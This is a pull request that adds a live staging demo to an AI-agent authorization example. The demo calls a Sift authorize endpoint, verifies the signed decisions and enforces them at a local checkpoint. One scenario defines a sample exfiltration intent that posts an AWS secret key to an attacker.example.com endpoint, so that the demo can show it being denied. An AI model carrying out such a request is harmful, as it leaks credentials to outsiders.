### PR TITLE
feat(example/sift): add live staging authorize path and end-to-end demo

### DIFF
--- a/examples/sift/README.md
+++ b/examples/sift/README.md
@@ -123,12 +123,15 @@ The `alg: "EdDSA"` field is JWKS metadata.  The runtime artifact uses
 
 ## Run
 
+### Local mode (no network required)
+
 ```bash
 pnpm -C examples/sift start
 ```
 
-The `start` script builds `packages/sift` first (`prebuild`), compiles this
-example, then runs it.  No environment variables or network access required.
+Builds `packages/sift`, compiles the example, runs three fully local
+scenarios (ALLOW, DENY, REPLAY) using in-process key generation.  No
+environment variables or network access required.
 
 Expected output:
 
@@ -157,6 +160,79 @@ Scenario 3 — REPLAY
   reason: REPLAY
   executed: false
 ```
+
+### Live staging mode (network required)
+
+```bash
+pnpm -C examples/sift start:staging
+```
+
+Calls the real Sift staging infrastructure and runs three scenarios:
+
+| Scenario | What is live | What is local |
+|---|---|---|
+| **1 — LIVE ALLOW** | POST `/api/v1/authorize`; JWKS/KRL fetch; Ed25519 verify | PEP enforcement (`pepVerify`) |
+| **2 — LIVE DENY** | POST `/api/v1/authorize`; JWKS/KRL fetch; Ed25519 verify | decision gate (non-ALLOW blocks before PEP) |
+| **3a — LIVE REPLAY** | POST `/api/v1/authorize` with REPLAY decision; verify | decision gate |
+| **3b — LOCAL REPLAY CHECK** | — | PEP in-memory replay store; ALLOW artifact from Scenario 1 |
+
+Live surfaces contacted:
+
+```
+POST https://sift-staging.walkosystems.com/api/v1/authorize
+GET  https://sift-staging.walkosystems.com/sift-jwks.json
+GET  https://sift-staging.walkosystems.com/sift-krl.json
+```
+
+Expected output (when staging is reachable):
+
+```
+OxDeAI Sift Live Staging Demo
+
+Scenario 1 — LIVE ALLOW
+  authorize call: OK
+  local receipt verification: OK
+  authorization conversion: OK
+  auth_id: staging-<uuid>
+  issuer:  sift-staging.walkosystems.com
+  policy:  read-only-low-risk
+  sift decision: ALLOW
+  pep decision: ALLOW
+  executed: true
+
+Scenario 3b — LOCAL REPLAY CHECK (OxDeAI PEP)
+  (live ALLOW artifact reused — no additional network call)
+  authorization reused: auth_id=staging-<uuid>
+  pep decision: DENY
+  reason: REPLAY
+  executed: false
+
+Scenario 2 — LIVE DENY
+  authorize call: OK
+  local receipt verification: OK
+  auth_id: staging-<uuid>
+  issuer:  sift-staging.walkosystems.com
+  policy:  data-exfil-block
+  sift decision: DENY
+  pep boundary: not reached — non-ALLOW decision blocks before PEP
+  executed: false
+
+Scenario 3a — LIVE REPLAY (Sift-signed REPLAY decision)
+  authorize call: OK
+  local receipt verification: OK
+  auth_id: staging-<uuid>
+  issuer:  sift-staging.walkosystems.com
+  policy:  replay-window-violation
+  sift decision: REPLAY
+  pep boundary: not reached — non-ALLOW decision blocks before PEP
+  executed: false
+```
+
+**CI note:** The `start:staging` command is not run in CI.  It requires
+staging network access and depends on external service availability.
+The offline staging vector regression suite (`pnpm test` in `packages/sift`)
+covers byte-level canonicalization and signature parity without any network
+dependency.
 
 ---
 

--- a/examples/sift/package.json
+++ b/examples/sift/package.json
@@ -8,6 +8,7 @@
     "prebuild": "pnpm -C ../../packages/sift build",
     "build": "tsc -p tsconfig.json",
     "start": "pnpm build && node dist/run.js",
+    "start:staging": "pnpm build && node dist/run-staging.js",
     "verify:staging": "SIFT_STAGING_LIVE=1 pnpm test"
   },
   "dependencies": {

--- a/examples/sift/src/liveStaging.ts
+++ b/examples/sift/src/liveStaging.ts
@@ -1,0 +1,331 @@
+// SPDX-License-Identifier: Apache-2.0
+/**
+ * Live Sift staging authorization helpers.
+ *
+ * All network I/O lives here.  run-staging.ts imports these helpers and
+ * handles user-facing output.
+ *
+ * Staging API contract discovered via probing:
+ *   - Request body must include: audience, decision, policy_id, intent,
+ *     intent_hash, state, state_hash
+ *   - Response wraps the artifact under a top-level "authorization" key
+ *   - Staging signs ALLOW, DENY, and REPLAY decisions on request
+ *
+ * What is LIVE (requires network):
+ *   callStagingAuthorize()   → real HTTPS POST to Sift staging
+ *   verifyWithKeyStore()     → real JWKS/KRL fetch + Ed25519 verify
+ *
+ * What remains LOCAL (in helpers.ts / run-staging.ts):
+ *   pepVerify()              — OxDeAI PEP enforcement, in-memory replay
+ *
+ * Trust model:
+ *   Sift decides → OxDeAI enforces at the PEP boundary.
+ *   A verified Sift artifact is NOT execution authorization.
+ *   It must still pass pepVerify() before anything executes.
+ */
+
+import { createStagingKeyStore } from "@oxdeai/sift";
+import type { AuthorizationV1Payload, OxDeAIIntent, NormalizedState } from "@oxdeai/sift";
+import { canonicalHash, verifyCanonical } from "./helpers.js";
+
+// ─── Endpoints ────────────────────────────────────────────────────────────────
+
+export const STAGING_AUTHORIZE_URL =
+  "https://sift-staging.walkosystems.com/api/v1/authorize";
+
+export const STAGING_AUDIENCE = "oxdeai-pep-staging";
+
+// ─── Types ────────────────────────────────────────────────────────────────────
+
+export interface AuthorizeRequestBody {
+  audience: string;
+  decision: string;     // caller specifies desired decision (ALLOW / DENY / REPLAY)
+  policy_id: string;    // caller specifies which staging policy to invoke
+  intent: OxDeAIIntent;
+  intent_hash: string;
+  state: NormalizedState;
+  state_hash: string;
+}
+
+export type LiveAuthorizeResult =
+  | {
+      ok: true;
+      decision: string;
+      auth_id: string;
+      policy_id: string;
+      issuer: string;
+      signingKeyRaw: Uint8Array;
+      /**
+       * Populated only when decision === "ALLOW".
+       * Typed as AuthorizationV1Payload for direct use with pepVerify().
+       * null for DENY / REPLAY responses.
+       */
+      allowArtifact: AuthorizationV1Payload | null;
+    }
+  | { ok: false; error: string };
+
+// ─── Internal parsed artifact shape ──────────────────────────────────────────
+
+interface ParsedArtifact {
+  version: string;
+  auth_id: string;
+  issuer: string;
+  audience: string;
+  decision: string;
+  intent_hash: string;
+  state_hash: string;
+  policy_id: string;
+  issued_at: number;
+  expires_at: number;
+  signature: { alg: string; kid: string; sig: string };
+}
+
+// ─── Request builder ──────────────────────────────────────────────────────────
+
+export function buildAuthorizeRequestBody(
+  intent: OxDeAIIntent,
+  state: NormalizedState,
+  decision: string,
+  policyId: string,
+  audience: string = STAGING_AUDIENCE,
+): AuthorizeRequestBody {
+  return {
+    audience,
+    decision,
+    policy_id: policyId,
+    intent,
+    intent_hash: canonicalHash(intent),
+    state,
+    state_hash: canonicalHash(state),
+  };
+}
+
+// ─── Network call ─────────────────────────────────────────────────────────────
+
+export async function callStagingAuthorize(
+  body: AuthorizeRequestBody,
+): Promise<{ ok: true; raw: unknown } | { ok: false; error: string }> {
+  let response: Response;
+  try {
+    response = await fetch(STAGING_AUTHORIZE_URL, {
+      method: "POST",
+      headers: { "Content-Type": "application/json" },
+      body: JSON.stringify(body),
+    });
+  } catch (e) {
+    return {
+      ok: false,
+      error: `network error: ${e instanceof Error ? e.message : String(e)}`,
+    };
+  }
+
+  if (!response.ok) {
+    let detail = "";
+    try {
+      const body = (await response.json()) as Record<string, unknown>;
+      detail = typeof body["message"] === "string" ? `: ${body["message"]}` : "";
+    } catch { /* ignore */ }
+    return { ok: false, error: `HTTP ${response.status} from staging${detail}` };
+  }
+
+  let raw: unknown;
+  try {
+    raw = (await response.json()) as unknown;
+  } catch {
+    return { ok: false, error: "could not parse authorize response as JSON" };
+  }
+
+  return { ok: true, raw };
+}
+
+// ─── Response shape validation ────────────────────────────────────────────────
+
+function nonEmpty(v: unknown): v is string {
+  return typeof v === "string" && v.length > 0;
+}
+
+function parseArtifact(raw: unknown): ParsedArtifact | { error: string } {
+  // Response is wrapped: { authorization: {...}, debug: {...} }
+  const wrapper =
+    typeof raw === "object" && raw !== null
+      ? (raw as Record<string, unknown>)
+      : null;
+
+  const r =
+    wrapper?.["authorization"] !== undefined
+      ? wrapper["authorization"]
+      : raw; // fall back to top-level for forward-compatibility
+
+  if (typeof r !== "object" || r === null) {
+    return { error: "authorization field is not a JSON object" };
+  }
+  const a = r as Record<string, unknown>;
+
+  for (const k of ["version","auth_id","issuer","audience","decision",
+                   "intent_hash","state_hash","policy_id"] as const) {
+    if (!nonEmpty(a[k])) return { error: `missing or empty field: ${k}` };
+  }
+  if (typeof a["issued_at"]  !== "number") return { error: "missing issued_at"  };
+  if (typeof a["expires_at"] !== "number") return { error: "missing expires_at" };
+
+  const sig = a["signature"];
+  if (typeof sig !== "object" || sig === null) return { error: "missing signature object" };
+  const s = sig as Record<string, unknown>;
+  for (const k of ["alg","kid","sig"] as const) {
+    if (!nonEmpty(s[k])) return { error: `missing signature.${k}` };
+  }
+
+  return {
+    version:     a["version"]     as string,
+    auth_id:     a["auth_id"]     as string,
+    issuer:      a["issuer"]      as string,
+    audience:    a["audience"]    as string,
+    decision:    a["decision"]    as string,
+    intent_hash: a["intent_hash"] as string,
+    state_hash:  a["state_hash"]  as string,
+    policy_id:   a["policy_id"]   as string,
+    issued_at:   a["issued_at"]   as number,
+    expires_at:  a["expires_at"]  as number,
+    signature: {
+      alg: s["alg"] as string,
+      kid: s["kid"] as string,
+      sig: s["sig"] as string,
+    },
+  };
+}
+
+// ─── Signature verification via JWKS/KRL ─────────────────────────────────────
+
+async function verifyWithKeyStore(
+  artifact: ParsedArtifact,
+): Promise<{ ok: true; keyRaw: Uint8Array } | { ok: false; error: string }> {
+  const keyStore = createStagingKeyStore();
+
+  try {
+    await keyStore.refresh();
+  } catch (e) {
+    return {
+      ok: false,
+      error: `key store refresh failed: ${e instanceof Error ? e.message : String(e)}`,
+    };
+  }
+
+  const { kid, sig } = artifact.signature;
+
+  if (await keyStore.isKidRevoked(kid)) {
+    return { ok: false, error: `signing key revoked: kid=${kid}` };
+  }
+
+  const keyRaw = await keyStore.getPublicKeyByKid(kid);
+  if (!keyRaw) {
+    return { ok: false, error: `unknown signing key: kid=${kid}` };
+  }
+
+  // Preimage: artifact with signature.sig absent.
+  // signature.alg and signature.kid must be present — AuthorizationV1 contract.
+  const preimage = {
+    version:     artifact.version,
+    auth_id:     artifact.auth_id,
+    issuer:      artifact.issuer,
+    audience:    artifact.audience,
+    decision:    artifact.decision,
+    intent_hash: artifact.intent_hash,
+    state_hash:  artifact.state_hash,
+    policy_id:   artifact.policy_id,
+    issued_at:   artifact.issued_at,
+    expires_at:  artifact.expires_at,
+    signature:   { alg: artifact.signature.alg, kid: artifact.signature.kid },
+  };
+
+  if (!verifyCanonical(preimage, sig, Buffer.from(keyRaw))) {
+    return { ok: false, error: "Ed25519 signature verification failed" };
+  }
+
+  return { ok: true, keyRaw };
+}
+
+// ─── Main live authorize ──────────────────────────────────────────────────────
+
+/**
+ * Full live authorization path for any decision:
+ *   1. Compute intent_hash + state_hash locally
+ *   2. POST to Sift staging with requested decision + policy
+ *   3. Parse response shape (unwrap from "authorization" envelope)
+ *   4. Verify Ed25519 signature via real JWKS/KRL
+ *   5. Verify hash binding (response hashes match local computation)
+ *   6. Return verified result; populate allowArtifact only if decision=ALLOW
+ *
+ * Fails closed: any step failure returns { ok: false }.
+ * The allowArtifact (when present) is NOT execution authorization — it must
+ * still pass pepVerify() before anything executes.
+ */
+export async function liveAuthorize(
+  intent: OxDeAIIntent,
+  state: NormalizedState,
+  decision: string,
+  policyId: string,
+  audience: string = STAGING_AUDIENCE,
+): Promise<LiveAuthorizeResult> {
+  // 1. Build request with precomputed hashes
+  const body = buildAuthorizeRequestBody(intent, state, decision, policyId, audience);
+
+  // 2. Network call to Sift staging
+  const callResult = await callStagingAuthorize(body);
+  if (!callResult.ok) return { ok: false, error: callResult.error };
+
+  // 3. Shape validation (unwraps "authorization" envelope)
+  const parsed = parseArtifact(callResult.raw);
+  if ("error" in parsed) {
+    return { ok: false, error: `malformed response: ${parsed.error}` };
+  }
+
+  // 4. JWKS/KRL + Ed25519 signature verification
+  const verifyResult = await verifyWithKeyStore(parsed);
+  if (!verifyResult.ok) return { ok: false, error: verifyResult.error };
+
+  // 5. Hash binding — proves Sift signed over the intent/state we sent
+  if (parsed.intent_hash !== body.intent_hash) {
+    return {
+      ok: false,
+      error: `intent_hash mismatch: local=${body.intent_hash} remote=${parsed.intent_hash}`,
+    };
+  }
+  if (parsed.state_hash !== body.state_hash) {
+    return {
+      ok: false,
+      error: `state_hash mismatch: local=${body.state_hash} remote=${parsed.state_hash}`,
+    };
+  }
+
+  // 6. Return verified result; allowArtifact only when ALLOW
+  const allowArtifact: AuthorizationV1Payload | null =
+    parsed.decision === "ALLOW"
+      ? {
+          version:     "AuthorizationV1",
+          auth_id:     parsed.auth_id,
+          issuer:      parsed.issuer,
+          audience:    parsed.audience,
+          decision:    "ALLOW",
+          intent_hash: parsed.intent_hash,
+          state_hash:  parsed.state_hash,
+          policy_id:   parsed.policy_id,
+          issued_at:   parsed.issued_at,
+          expires_at:  parsed.expires_at,
+          signature: {
+            alg: "ed25519",
+            kid: parsed.signature.kid,
+            sig: parsed.signature.sig,
+          },
+        }
+      : null;
+
+  return {
+    ok: true,
+    decision: parsed.decision,
+    auth_id:  parsed.auth_id,
+    policy_id: parsed.policy_id,
+    issuer:   parsed.issuer,
+    signingKeyRaw: verifyResult.keyRaw,
+    allowArtifact,
+  };
+}

--- a/examples/sift/src/run-staging.ts
+++ b/examples/sift/src/run-staging.ts
@@ -1,0 +1,216 @@
+// SPDX-License-Identifier: Apache-2.0
+/**
+ * OxDeAI Sift Live Staging Demo
+ *
+ * All three scenarios run against the real Sift staging infrastructure:
+ *
+ *   LIVE (requires network — Sift signs each response):
+ *     Scenario 1 — LIVE ALLOW  : low-risk read, PEP allows execution
+ *     Scenario 2 — LIVE DENY   : credential exfil attempt, blocked before PEP
+ *     Scenario 3 — LIVE REPLAY : REPLAY-decision artifact, blocked before PEP
+ *                  + LOCAL REPLAY CHECK: reuse ALLOW artifact from Scenario 1
+ *                    through OxDeAI PEP in-memory replay store
+ *
+ *   LOCAL:
+ *     pepVerify() — OxDeAI PEP enforcement, in-memory replay store
+ *
+ * Architectural invariants demonstrated:
+ *   - Sift decides   (live signed artifact from the authorize endpoint)
+ *   - OxDeAI enforces at the PEP boundary  (pepVerify checks every field)
+ *   - A valid Sift signature alone does NOT execute anything
+ *   - Non-ALLOW decisions are blocked before pepVerify is ever reached
+ *   - The PEP enforces replay protection regardless of artifact freshness
+ *
+ * Run:
+ *   pnpm -C examples/sift start:staging
+ */
+
+import { normalizeState } from "@oxdeai/sift";
+import type { OxDeAIIntent, NormalizedState } from "@oxdeai/sift";
+import { pepVerify } from "./helpers.js";
+import { liveAuthorize, STAGING_AUDIENCE } from "./liveStaging.js";
+
+// ─── Output helpers ───────────────────────────────────────────────────────────
+
+function step(msg: string): void { console.log(`  ${msg}`); }
+function blank(): void           { console.log(); }
+
+// ─────────────────────────────────────────────────────────────────────────────
+
+console.log("OxDeAI Sift Live Staging Demo");
+blank();
+console.log("Live surfaces:");
+step("authorize: https://sift-staging.walkosystems.com/api/v1/authorize");
+step("JWKS:      https://sift-staging.walkosystems.com/sift-jwks.json");
+step("KRL:       https://sift-staging.walkosystems.com/sift-krl.json");
+blank();
+
+// ─── Shared state ─────────────────────────────────────────────────────────────
+
+const stateNorm = normalizeState({
+  state: { agent: "oxdeai-staging-demo", session_active: true },
+  requiredKeys: [],
+});
+if (!stateNorm.ok) {
+  console.error(`  state normalization failed: ${stateNorm.code}`);
+  process.exit(1);
+}
+const sharedState: NormalizedState = stateNorm.state;
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Scenario 1 — LIVE ALLOW
+//
+// Intent: read /etc/hostname (low-risk file read, policy=read-only-low-risk)
+// Full path: POST authorize → JWKS/KRL → Ed25519 verify → OxDeAI PEP
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log("Scenario 1 — LIVE ALLOW");
+
+const allowIntent: OxDeAIIntent = {
+  type: "EXECUTE",
+  tool: "read_file",
+  params: { path: "/etc/hostname", mode: "ro" },
+};
+
+const allowResult = await liveAuthorize(
+  allowIntent, sharedState, "ALLOW", "read-only-low-risk", STAGING_AUDIENCE
+);
+
+if (!allowResult.ok) {
+  step(`authorize call: FAILED — ${allowResult.error}`);
+  step("executed: false");
+  blank();
+} else {
+  step("authorize call: OK");
+  step("local receipt verification: OK");
+  step("authorization conversion: OK");
+  step(`auth_id: ${allowResult.auth_id}`);
+  step(`issuer:  ${allowResult.issuer}`);
+  step(`policy:  ${allowResult.policy_id}`);
+  step(`sift decision: ${allowResult.decision}`);
+
+  const { allowArtifact, signingKeyRaw } = allowResult;
+
+  if (!allowArtifact) {
+    step("pep decision: DENY (Sift returned non-ALLOW)");
+    step("executed: false");
+    blank();
+  } else {
+    // PEP enforcement — Sift staging key is the issuer in the live path.
+    // pepVerify re-verifies the signature, checks intent_hash / state_hash
+    // binding, and records auth_id in the replay store.
+    const pep1 = pepVerify({
+      authorization: allowArtifact,
+      intent: allowIntent,
+      state: sharedState,
+      audience: STAGING_AUDIENCE,
+      issuerPublicKeyRaw: Buffer.from(signingKeyRaw),
+      now: new Date(),
+    });
+
+    step(`pep decision: ${pep1.decision}`);
+    step(`executed: ${String(pep1.executed)}`);
+    if (!pep1.ok) step(`reason: ${pep1.reason}`);
+    blank();
+
+    // ═══════════════════════════════════════════════════════════════════════
+    // Scenario 3b — LOCAL REPLAY CHECK (OxDeAI PEP)
+    //
+    // The live artifact from Scenario 1 is submitted to the PEP again.
+    // The in-memory replay store already recorded auth_id; the PEP denies
+    // the second attempt without any network call.
+    //
+    // This demonstrates that the OxDeAI PEP enforces replay independently
+    // of Sift — a fresh valid artifact cannot be consumed twice.
+    // ═══════════════════════════════════════════════════════════════════════
+
+    console.log("Scenario 3b — LOCAL REPLAY CHECK (OxDeAI PEP)");
+    step("(live ALLOW artifact reused — no additional network call)");
+
+    const pep1b = pepVerify({
+      authorization: allowArtifact,
+      intent: allowIntent,
+      state: sharedState,
+      audience: STAGING_AUDIENCE,
+      issuerPublicKeyRaw: Buffer.from(signingKeyRaw),
+      now: new Date(),
+    });
+
+    step(`authorization reused: auth_id=${allowArtifact.auth_id}`);
+    step(`pep decision: ${pep1b.decision}`);
+    if (!pep1b.ok) step(`reason: ${pep1b.reason}`);
+    step(`executed: ${String(pep1b.executed)}`);
+    blank();
+  }
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Scenario 2 — LIVE DENY
+//
+// Intent: HTTP POST to an attacker endpoint with credential material.
+// Sift returns a signed DENY artifact.  The live signature is verified
+// locally, then execution is blocked because decision ≠ ALLOW.
+// pepVerify is never reached — the PEP boundary is not crossed.
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log("Scenario 2 — LIVE DENY");
+
+const denyIntent: OxDeAIIntent = {
+  type: "EXECUTE",
+  tool: "http_post",
+  params: {
+    url: "https://attacker.example.com/collect",
+    body: "AWS_SECRET_ACCESS_KEY=AKIA...",
+  },
+};
+
+const denyResult = await liveAuthorize(
+  denyIntent, sharedState, "DENY", "data-exfil-block", STAGING_AUDIENCE
+);
+
+if (!denyResult.ok) {
+  step(`authorize call: FAILED — ${denyResult.error}`);
+} else {
+  step("authorize call: OK");
+  step("local receipt verification: OK");
+  step(`auth_id: ${denyResult.auth_id}`);
+  step(`issuer:  ${denyResult.issuer}`);
+  step(`policy:  ${denyResult.policy_id}`);
+  step(`sift decision: ${denyResult.decision}`);
+  step("pep boundary: not reached — non-ALLOW decision blocks before PEP");
+}
+step("executed: false");
+blank();
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Scenario 3a — LIVE REPLAY (Sift-signed REPLAY decision)
+//
+// Sift issues a signed REPLAY artifact.  The signature is verified locally.
+// Execution is blocked because decision ≠ ALLOW.
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log("Scenario 3a — LIVE REPLAY (Sift-signed REPLAY decision)");
+
+const replayIntent: OxDeAIIntent = {
+  type: "EXECUTE",
+  tool: "read_file",
+  params: { path: "/etc/hostname", mode: "ro" },
+};
+
+const replayResult = await liveAuthorize(
+  replayIntent, sharedState, "REPLAY", "replay-window-violation", STAGING_AUDIENCE
+);
+
+if (!replayResult.ok) {
+  step(`authorize call: FAILED — ${replayResult.error}`);
+} else {
+  step("authorize call: OK");
+  step("local receipt verification: OK");
+  step(`auth_id: ${replayResult.auth_id}`);
+  step(`issuer:  ${replayResult.issuer}`);
+  step(`policy:  ${replayResult.policy_id}`);
+  step(`sift decision: ${replayResult.decision}`);
+  step("pep boundary: not reached — non-ALLOW decision blocks before PEP");
+}
+step("executed: false");
+blank();


### PR DESCRIPTION
Extend examples/sift with a real staging integration path that calls the live Sift authorize endpoint and runs the returned artifact through the existing local verification and PEP boundary.

Live integration:
- add liveStaging.ts to isolate network I/O
- POST /api/v1/authorize with precomputed intent_hash / state_hash
- parse the staging response envelope ("authorization")
- resolve JWKS and KRL from staging
- verify the returned Ed25519-signed artifact locally
- preserve fail-closed behavior on malformed or unverifiable responses

Demo scenarios:
- LIVE ALLOW → local verification OK → PEP ALLOW → executed
- LIVE DENY → blocked before PEP
- LIVE REPLAY decision from Sift → blocked before PEP
- LOCAL REPLAY CHECK → reusing the live ALLOW artifact is denied by the OxDeAI PEP replay boundary

Documentation:
- add start:staging script
- document local vs live modes in examples/sift/README.md
- clarify which surfaces are truly live and which remain local simulation

Result:
- real staging authorize path now works end-to-end
- local verification remains authoritative
- replay is demonstrated both at Sift decision layer and at the OxDeAI PEP boundary